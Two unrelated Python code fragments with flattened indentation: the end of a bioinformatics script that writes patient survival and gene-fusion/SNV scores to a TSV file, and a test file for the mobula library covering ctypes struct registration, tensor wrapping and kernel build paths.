    fileout = '/home/wzt/project/GeneFusion/Data2/results/OS_91011_Score_CTL.tsv'
fusion_dict = getfusionScore()
SNVIndel_dict = getSNVIndelScore()
filein = '/home/wzt/project/GeneFusion/Data2/Sample_State_1.tsv'
with open(filein,'r') as fin:
fin.readline()
for line in fin:
lines = line.strip().split('\t')
if lines[0] == 'Pt8':
continue
myPFS[lines[0]] = '\t'.join((lines[3],str(float(lines[1])/30),lines[2],lines[4],lines[5],lines[6])) ### CTL
with open(fileout,'w') as fout:
fout.write('Patient\tgroup\tOS\tEvent\tCTL\tGender\tAge\tFusion\tSNVIndel\n')
for Pat in Pts:
Fusion_score = str(fusion_dict.get(Pat,0))
SNV_score = str(SNVIndel_dict.get(Pat,0))
fout.write('{}\t{}\t{}\t{}\n'.format(Pat,myPFS[Pat],Fusion_score,SNV_score))
if __name__ == '__main__':
    main()
|
501573
|
import ctypes
import os
import mobula
from mobula.testing import assert_almost_equal, gradcheck
def test_custom_struct():
class MyStruct(ctypes.Structure):
_fields_ = [
('hello', ctypes.c_int),
('mobula', ctypes.c_float),
]
mobula.glue.register_cstruct('MyStruct', MyStruct)
mobula.op.load('MyStruct', os.path.dirname(__file__))
    # Pass the struct as a tuple matching MyStruct's field order: (hello, mobula).
    res = mobula.func.hello((42, 39))
    assert_almost_equal(res, 42 + 39)
def test_custom_ctensor():
class CTensor(ctypes.Structure):
_fields_ = [
('data', ctypes.POINTER(ctypes.c_float)),
('size', ctypes.c_int),
]
    def CTensorConstructor(var):
        # Wrap a framework tensor (e.g. a NumPy array) into the CTensor struct
        # expected by the kernel: a raw float pointer plus the element count.
        glue_mod = mobula.glue.backend.get_var_glue(var)
        tensor = glue_mod.Tensor(var)
        data_ptr = ctypes.cast(tensor.data_ptr, ctypes.POINTER(ctypes.c_float))
        return CTensor(data_ptr, var.size)
mobula.glue.register_cstruct('CTensor', CTensor, CTensorConstructor)
mobula.op.load('CTensor', os.path.dirname(__file__))
import numpy as np
x = np.array([1, 2, 3], dtype=np.float32)
    y = x + 1
    # The loaded kernel should increment x in place by 1, so x ends up equal to y.
    mobula.func.ctensor_inc(1, x)
    assert_almost_equal(y, x)
def test_build_path():
new_build_path = os.path.join(os.path.dirname(__file__), 'a_new_path')
old_build_path = mobula.config.BUILD_PATH
with mobula.config.TempConfig(BUILD_PATH=new_build_path, BUILD_IN_LOCAL_PATH=False):
mobula.config.BUILD_PATH = new_build_path
module_name = 'BuildPath'
mobula.op.load(module_name, os.path.dirname(__file__))
res = mobula.func.TestBuildPath()
assert res == 42
def build_existed(path, module_name):
dirname = os.path.join(path, 'build')
if not os.path.isdir(dirname):
return False
for name in os.listdir(dirname):
if name.startswith(module_name):
return True
return False
assert not build_existed(old_build_path, module_name)
assert build_existed(new_build_path, module_name)
def test_template_build():
with mobula.config.TempConfig(BUILD_IN_LOCAL_PATH=True):
mobula.op.load('./test_template', os.path.dirname(__file__))
mobula.func.mul_elemwise.build('cpu', ['float'])
mobula.func.mul_elemwise.build('cpu', dict(T='int'))
        assert mobula.config.BUILD_IN_LOCAL_PATH
env_path = os.path.dirname(__file__)
code_fname = os.path.join(
env_path,
'test_template', 'build', 'cpu', 'test_template_wrapper.cpp')
        with open(code_fname) as fcode:
            code = fcode.read()
        '''
        On Windows, `ctypes.c_int` is an alias of `ctypes.c_long`, whose name is
        `c_long`, so `get_ctype_name` reports `int32_t` rather than `int`; the
        assertion below therefore only checks the `mul_elemwise_kernel<int` prefix.
        '''
assert 'mul_elemwise_kernel<float>' in code, code
assert 'mul_elemwise_kernel<int' in code, code
if __name__ == '__main__':
test_custom_struct()
test_custom_ctensor()
test_build_path()
test_template_build()
|